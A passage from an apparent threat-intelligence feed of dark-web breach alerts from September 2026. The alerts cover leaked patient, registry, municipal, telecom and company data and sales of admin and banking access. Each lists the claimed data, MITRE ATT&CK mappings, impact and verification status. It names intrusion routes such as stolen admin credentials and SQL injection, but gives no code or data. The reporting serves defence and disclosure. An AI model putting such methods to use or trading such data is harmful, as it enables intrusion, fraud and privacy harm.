[T1190](https://attack.mitre.org/techniques/T1190/) Exploit public facing application Inferred A complete export of both the document database and the file storage of a mobile application backend is more characteristic of permissive access rules than of a server intrusion. No flaw is named. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred Eighty five collections were exported together, including change logs and message history rather than only current records. - Collection [T1530](https://attack.mitre.org/techniques/T1530/) Data from cloud storage Inferred The file archive is itemised by media type and by application area, which indicates the storage bucket was enumerated in full alongside the database. ### ⚠Potential impact This is **identified cancer patients tied to diagnosis, stage, metastasis, treatment and family history**, which is the most protected category of personal data there is, and disclosure of it reaches employment, insurance and family life in ways that cannot be undone. The **free text is worse than the fields**: nurse and practitioner notes, thousands of private messages and assistant conversations record what people said in confidence during the hardest period of their lives, including things they may not have told their families. The clinician side compounds it, since **named oncologists with direct contact details** appear alongside the patients they treat, which exposes the care relationship itself. ### iStatus Unverified The inventory is **unusually granular**, with per table row counts, file counts broken down by format and application area, and demographic splits, which is the work of someone who has parsed the export rather than described it from memory. Nothing is said about **how it was obtained**, and the platform stack named in the post points more towards a configuration failure than an intrusion, though that remains inference. The account is **established with a paid rank** and the data is released free, so there is no price being defended. Dark Web Informer has **not retrieved the files and is not linking them**, and Jinko has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=jinko-care-2026-09-07&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=jinko-care-2026-09-07&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=jinko-care-2026-09-07&utm%5Fcontent=footer) // Threat Intelligence ### Admin Access to a Dubai Car Marketplace Advertised With Seller Data URL: https://darkwebinformer.com/admin-access-to-a-dubai-car-marketplace-advertised-with-seller-data/ Last updated: 2026-09-07T15:35:33.000Z Access Listing United Arab Emirates Vehicle Marketplace Shared Free ## Admin Access to a Dubai Car Marketplace Advertised With Seller Data A forum actor posting as **Keishell**, crediting two others, claims to have **gained access to the administrative panel** of **ryxcars.com**, a luxury vehicle marketplace based in Dubai. The post states the account can read **every registered seller's details and modify them**. The listed data covers **seller names, email addresses, phone numbers, account type, verification status, registration dates and listing counts**, together with the vehicle side: **listing identifiers, makes, models, years, prices, currencies, locations, mileage, rental daily rates and the link between each seller and their vehicles**. A panel screenshot showing a moderator session, 217 sellers and 313 listings is offered as proof. The claim is **unverified**. Severity MODERATE [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Sellers217 Listings313 AccessAdmin panel ActorKeishell ### ▣Post details Targetryxcars.com CountryUnited Arab Emirates SectorVehicle marketplace ListingFree, reply to unlock Volume217 sellers, 313 listings Access levelModerator, read and write ObservedSep 4, 2026 ActorKeishell, with two others ### !What the post claims - Administrative panel access - Moderator level session shown - Records can be modified - Seller full names - Seller email addresses - Seller phone numbers - Account and status information - Verification status - Account type - Registration dates - Listing counts per seller - Vehicle listing identifiers - Makes, models and years - Prices and currencies - Vehicle locations - Mileage - Rental daily rates - Seller to vehicle associations ### ◱Screenshot [ ![Forum post advertising administrative access to a Dubai luxury vehicle marketplace, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/234597823562876358762356878273.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/234597823562876358762356878273.png) Forum post advertising RyxCars administrative access, observed 4 September 2026. ### ☷Mapped techniques Mapped from the actors' own account. Claimed, not confirmed. - Initial access [T1078](https://attack.mitre.org/techniques/T1078/) Valid accounts Stated The proof image shows a signed in moderator session in the platform's own administration area. How the account was obtained is not described. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated Seller records and vehicle listings are both reachable through the same interface, with the association between them included. - Impact [T1565.001](https://attack.mitre.org/techniques/T1565/001/) Stored data manipulation Stated The post states the access permits changes to seller information, not only reading it, and the panel exposes verification and status controls. ### ⚠Potential impact By volume this is small, a few hundred sellers and listings, so the exposure is not the point. **The write access is.** On a platform trading high value vehicles, the ability to edit a listing's price or a seller's contact details is a route to **payment redirection against buyers** at sums where a single success pays for the effort. The **verification controls matter just as much**, since granting or removing a verified badge manipulates the one signal buyers use to judge who is legitimate. If the access is still live, this is an operational problem rather than a disclosure problem. ### iStatus Unverified The screenshot is **internally coherent**, showing a signed in moderator account, seller counts that agree with the listing totals, and interface controls consistent with the capabilities described. It still proves **a session at one moment rather than access that persists**, and no acquisition route, date or credential source is given. The same crew has credited itself on several recent posts, which is worth tracking. Dark Web Informer has **not tested the access and is not linking the material**, and the platform has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=ryxcars-2026-09-04&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=ryxcars-2026-09-04&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=ryxcars-2026-09-04&utm%5Fcontent=footer) // Threat Intelligence ### INPI Registry Files With 27 Million Director Records Published URL: https://darkwebinformer.com/inpi-registry-files-with-27-million-director-records-published/ Last updated: 2026-09-04T19:38:12.000Z Breach Report France Public Registry Published Free ## INPI Registry Files With 27 Million Director Records Published A forum actor posting as **fuie** has published data attributed to **INPI**, the French institute that administers industrial property and the national business register. The actor states they reached a **file transfer service on an INPI data domain using an administrator account**, found more than **170 GB** available and downloaded what they could. The release is given as **27,348,474 records**, 16.47 GB compressed and 165.42 GB expanded, described as covering **full names of directors and representatives including birth names, month and year of birth, postal code, municipality and country of residence, professional roles, and the company name, identifier and legal form each person is attached to**. A transfer log is offered as proof. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Records27,348,474 Uncompressed165 GB AccessAdmin account Actorfuie ### ▣Post details TargetINPI CountryFrance SectorPublic registry ListingPoints to unlock Volume27,348,474 records Stated sourceAdministrator account ObservedSep 4, 2026 Actorfuie ### !What the post claims - 27,348,474 records - 165.42 GB uncompressed - 16.47 GB compressed - More than 170 GB seen on the server - Administrator account used - File transfer service reached - Directors and representatives named - Birth names and usage names - Month and year of birth - Postal codes - Municipalities - Country of residence - Professional roles - Company names - Company identifiers - Legal forms - Registry formality archives - Transfer log offered as proof ### ◱Screenshot [ ![Forum post publishing registry data attributed to the French industrial property institute, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/237895726893598762359876239687598762.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/237895726893598762359876239687598762.png) Forum post publishing INPI registry files, observed 4 September 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Initial access [T1078](https://attack.mitre.org/techniques/T1078/) Valid accounts Stated The actor describes signing in to a file transfer service with an administrator account rather than exploiting a flaw. How that credential was obtained is not addressed. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated Bulk registry archives were listed and retrieved, with more visible on the server than was taken. - Exfiltration [T1048](https://attack.mitre.org/techniques/T1048/) Exfiltration over alternative protocol Stated The proof image is a client transfer log showing multi gigabyte archives pulled down over the same file transfer channel used for access. ### ⚠Potential impact Much of the French business register is **public by design**, so company names, identifiers and legal forms are not the story. The value sits in the **personal layer that is normally restricted**: birth names, dates of birth and residential locality tied to named company officers. Those are exactly the details used to verify identity by telephone and to reset accounts, and **a birth name is not something anyone can change**. At this scale the set effectively covers the country's company directors and representatives, which makes it both an identity resource and **a ranked target list for business fraud**, since each person arrives attached to their role and their company. ### iStatus Unverified The proof offered is **a transfer log rather than the data**, though the file names, multi gigabyte sizes and dated naming pattern are consistent with how bulk registry archives are actually published. The important gap is the credential: the actor claims **an administrator account** and says nothing about where it came from, which leaves open whether this was a leaked login, a reused password or an account that should never have had that reach. The visible sample is a **company record of the kind already published openly**, so it demonstrates little about the restricted personal fields the post advertises. Dark Web Informer has **not retrieved the files and is not linking them**, and INPI has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=inpi-2026-09-04&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=inpi-2026-09-04&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=inpi-2026-09-04&utm%5Fcontent=footer) // Threat Intelligence ### Online Banking Access to a BNP Paribas Savings Account Offered for Sale URL: https://darkwebinformer.com/online-banking-access-to-a-bnp-paribas-savings-account-offered-for-sale/ Last updated: 2026-09-04T18:08:04.000Z Access Listing France Banking Price By Offer ## Online Banking Access to a BNP Paribas Savings Account Offered for Sale A forum actor posting as **HollowCrimeCorp** is selling what they describe as **verified and active access to a high value BNP Paribas account**, offered as a username and password pair rather than as data. The post claims **full dashboard visibility and working transfer capability**. The proof supplied is a screenshot of a **workplace savings and retirement portal** showing a total balance of roughly **262,000 euros**, recent contribution entries and an amount available for withdrawal. **Escrow is required** and the price is by private negotiation. This is a single account rather than a dataset. The claim is **unverified**. Severity MODERATE [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Balance shown262,842 EUR AccessUser and password ScopeOne account ActorHollowCrimeCorp ### ▣Listing details InstitutionBNP Paribas CountryFrance SectorBanking ProductWorkplace savings portal Access levelFull online banking TermsEscrow required ObservedSep 4, 2026 ActorHollowCrimeCorp ### !What the listing claims - Full online banking access - Username and password supplied - Access described as verified - Access described as active - Dashboard visibility - Transfer capability - Workplace savings portal - Balance of about 262,000 euros - Retirement savings products - Amount available to withdraw - Recent contribution entries - Single account offered - Escrow mandatory - Price by private message - Group attribution claimed - No acquisition method described - No account holder named - No further samples offered ### ◱Screenshot [ ![Forum listing offering online banking access to a French savings account, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/23458976023578678926359876239687596872.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/23458976023578678926359876239687596872.png) Forum post offering banking access for sale, observed 4 September 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Initial access [T1078](https://attack.mitre.org/techniques/T1078/) Valid accounts Stated What is being sold is a working credential pair for the account holder's own banking login, not a flaw in the bank. - Credential access [T1589.001](https://attack.mitre.org/techniques/T1589/001/) Gather victim credentials Inferred No acquisition route is given. Credentials offered this way usually originate from infostealer logs or phishing rather than from any compromise of the institution. - Impact [T1657](https://attack.mitre.org/techniques/T1657/) Financial theft Stated The advertised value is the ability to move money, with the visible balance used as the selling point. ### ⚠Potential impact Unlike the database listings that dominate this market, the harm here is **concentrated on one person**, and it is severe for them: retirement savings are usually the largest sum an individual holds and the slowest to rebuild. Because the portal shown is a **workplace scheme**, an employer's plan administration may be touched as well, and the visibility on offer exposes contribution history and withdrawal eligibility, which supports **follow on fraud even if no transfer succeeds**. Worth stating plainly: nothing here indicates a compromise of the bank, only of one customer's credentials. ### iStatus Unverified A screenshot is **the weakest form of proof in this particular market**, since images circulate between sellers, are trivially edited, and demonstrate a session at one moment rather than access that still works. No acquisition method, date or account holder is given, and the words verified and active are **sales language rather than evidence**. The escrow requirement suggests the seller expects buyers to doubt them. Dark Web Informer has **not tested the access and is not linking the contact address**. Want everything on this listing? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=bnp-paribas-access-2026-09-04&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=bnp-paribas-access-2026-09-04&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=bnp-paribas-access-2026-09-04&utm%5Fcontent=footer) // Threat Intelligence ### AMF Data Leaked With Plaintext Passwords for Town Hall Accounts URL: https://darkwebinformer.com/amf-data-leaked-with-plaintext-passwords-for-town-hall-accounts/ Last updated: 2026-09-04T17:56:32.000Z Breach Report France Local Government Plaintext Passwords ## AMF Data Leaked With Plaintext Passwords for Town Hall Accounts A forum actor posting as **Alduin** has published data attributed to **amf.asso.fr**, the site of the **Association des Maires de France**, which represents mayors and heads of intermunicipal bodies. The actor states they found **a union based SQL injection** and extracted three tables. The largest is a subscriber list of **named officials with work email addresses, job titles and employing commune**. The second is an account table holding **bcrypt hashes and a super administrator flag**. The third is smaller and more serious: **login addresses for town halls stored alongside passwords in plaintext**. The files are released free behind a reply requirement. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Subscribers114,000 TablesThree PasswordsPlaintext ActorAlduin ### ▣Post details Targetamf.asso.fr CountryFrance SectorLocal government body ListingFree, reply to unlock VolumeThree tables, 114K claimed Stated sourceSQL injection ObservedSep 4, 2026 ActorAlduin ### !What the post claims - SQL injection found - Union based technique named - Three tables extracted - 114,000 subscriber records - Names and first names - Work email addresses - Job titles - Employing commune or body - Subscription start dates - Subscription end dates - Account table with bcrypt hashes - Super administrator flags - Account type and identifiers - Synchronisation version values - Second account table - Plaintext passwords - Town hall login addresses - JSONL format ### ◱Screenshots [ ![Forum post publishing data attributed to the French association of mayors, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/4978357280936578962359876235987629873598.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/4978357280936578962359876235987629873598.png) [ ![Second section of the same post showing two account tables, shown redacted](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/4978357280936578962359876235987629873599.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/4978357280936578962359876235987629873599.png) Forum post publishing AMF data, observed 4 September 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Initial access [T1190](https://attack.mitre.org/techniques/T1190/) Exploit public facing application Stated The actor names an injection flaw in a query parameter as the entry point and says the tables were selected once access was obtained. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated Three tables were chosen and exported individually rather than the database being taken wholesale, which indicates query level access. - Credential access [T1552](https://attack.mitre.org/techniques/T1552/) Unsecured credentials Stated One table stores passwords without hashing, so the credentials are usable as they stand rather than requiring cracking. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution runs through forum hosting behind a reply wall. ### ⚠Potential impact The plaintext table is the urgent part, because those credentials are **usable immediately and the logins are official town hall and council addresses**. The passwords visible in the sample are the kind people actually choose, built from place names and years, which makes **reuse across municipal email and other local systems very likely**. Separately, the subscriber list maps **named officials, their roles and their commune across the country**, which is a ready made targeting list for approaches to local government, and the super administrator flag in the second table points at the accounts worth attacking first. Anyone with an account here should treat that password as burned everywhere it was used. ### iStatus Unverified The post is **more specific than most about method and structure**, naming the flaw class, listing three schemas with consistent field naming and giving a size for each file. The passwords in the sample are a point in its favour, since they follow the untidy patterns real users produce rather than anything a fabricator would generate. What is absent is **any way to check the 114,000 figure**, which appears only in the thread title. Dark Web Informer has **not retrieved the files and is not linking them**, and AMF has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=amf-2026-09-04&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=amf-2026-09-04&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=amf-2026-09-04&utm%5Fcontent=footer) // Threat Intelligence ### Réso Files Totalling 675 GB Offered for Sale After a Silent Period Ends URL: https://darkwebinformer.com/reso-files-totalling-675-gb-offered-for-sale-after-a-silent-period-ends/ Last updated: 2026-09-03T16:36:33.000Z Breach Report France Construction Price By Offer ## Réso Files Totalling 675 GB Offered for Sale After a Silent Period Ends A forum actor posting as **caustic** claims to hold **675 GB** taken from the network of **Réso**, a French supplier of construction products including ceilings, partitions, floors and facades, with agencies across the country. The post gives **roughly 43,000 folders and 530,000 files**, publishes **a complete file listing** along with one user folder as a sample and several mirrors, and describes the contents as **invoices, customer records, partner data, private conversations, orders, business strategy documents and technical drawings**. The wording indicates **a period of silence on both sides before publication**, which the actor now ends by inviting buyers. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Size675 GB Files530,000 Folders43,000 Actorcaustic ### ▣Post details Targetreso.fr CountryFrance SectorConstruction products ListingSelling, price by offer Volume675 GB, 530,000 files Stated sourceNetwork access ObservedSep 3, 2026 Actorcaustic ### !What the post claims - 675 GB of data - About 43,000 folders - About 530,000 files - Complete file listing published - One user folder as a sample - Several mirrors offered - Invoices - Customer records - Partner data - Private conversations - Orders - Business strategy documents - Technical drawings - Access described as network wide - Silence before publication - Now offered to buyers - Escrow suggested - Contact by messenger only ### ◱Screenshot [ ![Forum post offering 675 GB of files attributed to a French construction products company, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/23786959782635987623598762395876967823.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/23786959782635987623598762395876967823.png) Forum post offering Réso files for sale, observed 3 September 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Collection [T1039](https://attack.mitre.org/techniques/T1039/) Data from network shared drive Inferred Volume expressed in folders and files, with an individual user folder offered as a sample, describes a file share rather than an application or database. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated The actor lists finance, sales, partner and engineering material together, which spans several internal systems rather than one. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Listings and samples are distributed through several public file hosts. The route out of the environment is not described. - Impact [T1657](https://attack.mitre.org/techniques/T1657/) Financial theft Inferred The reference to mutual silence now ending, followed by an invitation to buyers, is the familiar shape of a private demand that produced no payment. ### ⚠Potential impact Publishing **a complete file listing is itself an act with consequences**, because it maps the company's internal structure and tells anyone else looking exactly what exists and where, whether or not they ever obtain the archive. The categories named go well beyond privacy: **private conversations and strategy documents carry commercial and legal exposure**, and invoices, orders and partner records extend it to counterparties across a construction supply chain who had no involvement. Technical drawings are the quiet risk, since for a facades and partitions supplier they describe **how specific buildings are put together**. ### iStatus Unverified This listing is **more checkable than most**, since a full index and a complete sample folder are published, so the structure and the file names can be examined by anyone willing to, and a fabricated set of that size would be difficult to sustain. The timeline is the notable part: the phrasing about mutual silence now ending indicates **a private approach to the company before this post**, which is the standard pattern when a demand goes unpaid. The account is **established with a paid rank and a short history**. Dark Web Informer has **not retrieved the files and is not linking them**, nor the contact address, and Réso has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=reso-2026-09-03&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=reso-2026-09-03&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=reso-2026-09-03&utm%5Fcontent=footer) // Threat Intelligence ### HopCharge Analytics Export Published With Names, Phones and Coordinates URL: https://darkwebinformer.com/hopcharge-analytics-export-published-with-names-phones-and-coordinates/ Last updated: 2026-09-03T15:38:13.000Z Breach Report India EV Charging Published Free ## HopCharge Analytics Export Published With Names, Phones and Coordinates A forum actor posting as **GoreTerminal** has published what they describe as the database of **hopcharge.com**, an on demand doorstep electric vehicle charging service operating in India through mobile vans. The release is **19,323 accounts in JSON Lines format**, 114 MB uncompressed. The field list is not a customer table but a **product analytics event export**, carrying **full names, phone numbers, email addresses, IP addresses, latitude and longitude, device make, model and carrier, operating system, and per user counts for bookings made, cars added, saved locations and total money spent**. The data is released free behind a reply requirement. The claim is **unverified**. Severity MODERATE [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Accounts19,323 Size114 MB DistributionFree ActorGoreTerminal ### ▣Post details Targethopcharge.com CountryIndia SectorEV charging service ListingFree, reply to unlock Volume19,323 accounts FormatJSON Lines, 114 MB ObservedSep 3, 2026 ActorGoreTerminal ### !What the post claims - 19,323 accounts - JSON Lines format - 114 MB uncompressed - Analytics event export - Full names - Phone numbers - Email addresses - IP addresses - Latitude and longitude - City, region and country - Device make and model - Mobile carrier - Operating system and version - Application version - Bookings made per user - Cars added per user - Saved locations count - Total money spent - Pending payment flag - Event and upload timestamps ### ◱Screenshot [ ![Forum post publishing an analytics export attributed to an Indian EV charging service, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/323798592768356967823598762396875968723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/323798592768356967823598762396875968723.png) Forum post publishing HopCharge account data, observed 3 September 2026. ### ☷Mapped techniques The post describes no intrusion method. Both entries are inferred from the artefacts, not stated. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred The field names match the export schema of a third party product analytics platform, so the source is more likely that platform's project than the company's own application database. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution runs through forum hosting behind a reply wall. The route out of the environment is not described. ### ⚠Potential impact Analytics telemetry is more revealing than a customer table because it records **behaviour as well as identity**. For a service that drives to the customer, the **coordinates are where the vehicle was actually charged**, which in practice means a home or workplace, tied to a full name and a phone number. The per user totals for spend, bookings and vehicles added **rank the list by value**, and the device, carrier and IP fields give an attacker enough to make an account recovery or support call sound authentic. ### iStatus Unverified The schema is **a standard analytics export rather than anything bespoke**, which points at an exposed or misconfigured analytics project rather than a compromise of the service itself, though nothing in the post addresses how it was obtained. The published sample **sits awkwardly with the headline**: it is dated 2021 and describes a user in the United States on a US carrier, which is hard to square with a service operating in India and with the claim that these are active accounts. The account is new with no standing, and Dark Web Informer has **not retrieved the file and is not linking it**. HopCharge has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=hopcharge-2026-09-03&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=hopcharge-2026-09-03&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=hopcharge-2026-09-03&utm%5Fcontent=footer) // Threat Intelligence ### More Than a Million Salt Mobile Records Offered for Sale URL: https://darkwebinformer.com/more-than-a-million-salt-mobile-records-offered-for-sale/ Last updated: 2026-09-03T15:31:34.000Z Breach Report Switzerland Telecoms Price By Offer ## More Than a Million Salt Mobile Records Offered for Sale A forum actor posting as **SaltMobile1** is selling what they describe as a database of **Salt**, a Swiss mobile operator, containing **more than 1,090,000 records**. The stated fields are **record identifier, name, date of birth, street and house number, postal code, city, country, a complete address string, email address, up to three telephone numbers, a count of numbers held and a timestamp**. The actor's own word for how it was obtained is **scraped** rather than breached, and no mechanism is described. The post also carries a warning that **another party is reselling the same samples**. Price is by negotiation. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Records1,090,000+ Extraction datedJan 2026 Method claimedScraping ActorSaltMobile1 ### ▣Post details TargetSalt CountrySwitzerland SectorMobile telecoms ListingSelling, price by offer Volume1,090,000+ records Stated sourceScraping ObservedSep 2, 2026 ActorSaltMobile1 ### !What the post claims - More than 1,090,000 records - Described as scraped - Record identifiers - Full names - Dates of birth - Street and house number - Postal code and city - Country field - Complete address string - Email addresses - Up to three phone numbers - Count of numbers per record - Extraction timestamps - Sample published inline - Price by negotiation - Warning about a rival seller - Offer of further samples - No mechanism described ### ◱Screenshot [ ![Forum listing selling an alleged Salt Mobile database of over one million Swiss records, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/62378523978659287635987623598762938765.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/62378523978659287635987623598762938765.png) Forum post offering Salt Mobile records for sale, observed 2 September 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Initial access [T1190](https://attack.mitre.org/techniques/T1190/) Exploit public facing application Inferred Collection at this volume through scraping implies an interface returning full customer records to an unauthenticated or weakly limited caller. No endpoint is named. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred Every sample row carries a timestamp within the same second, differing only in fractions, which indicates one automated run rather than records created over time. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Samples are posted inline and the sale is handled through messaging services. ### ⚠Potential impact For a mobile operator's customers the sharp risk is **account recovery and SIM swap**, because name, date of birth and address are the details support desks still use to confirm identity, and here they arrive **already attached to the subscriber's own numbers**. Records holding two or three numbers also expose **household or family groupings**, which makes a call claiming to be about a relative's line considerably more convincing. Dates of birth are the element that lifts this above an ordinary marketing list, since they are reused as a verification factor well beyond telecoms. ### iStatus Unverified The **timestamps are the most informative detail in the post**: across the sample they fall within a single second in January 2026, differing only in fractions, which is the signature of one scripted collection run rather than data accumulated by a business over years. The actor also says **scraped rather than breached**, which points at an interface returning more than it should rather than an intrusion, and the field mixture sits oddly, since address and multiple phone numbers resemble directory data while dates of birth and email addresses do not. **Provenance is contested**, with the post itself alleging another seller is circulating the same samples. Dark Web Informer has **not retrieved the data and is not linking the contact addresses**, and Salt has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=salt-mobile-2026-09-02&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing 